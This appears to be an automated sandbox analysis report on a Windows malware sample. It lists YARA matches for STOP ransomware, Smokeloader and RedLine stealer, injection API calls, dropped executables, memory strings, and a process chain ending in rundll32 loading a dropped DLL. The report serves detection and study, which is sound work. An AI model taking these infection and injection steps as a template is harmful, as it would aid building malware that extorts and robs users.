Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: String function: 00413FF0 appears 54 times

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,

Source: Library.exe.25.dr

Static PE information: No import functions for PE file found

Source: 226F.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: aw9Ynwqd1x.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@30/14@4/5

Source: C:\Users\user\AppData\Local\Temp\336E.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
Source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: aw9Ynwqd1x.exe	ReversingLabs: Detection: 84%
Source: aw9Ynwqd1x.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\aw9Ynwqd1x.exe C:\Users\user\Desktop\aw9Ynwqd1x.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dbjigst C:\Users\user\AppData\Roaming\dbjigst
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\336E.exe C:\Users\user\AppData\Local\Temp\336E.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\226F.exe C:\Users\user\AppData\Local\Temp\226F.exe
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry 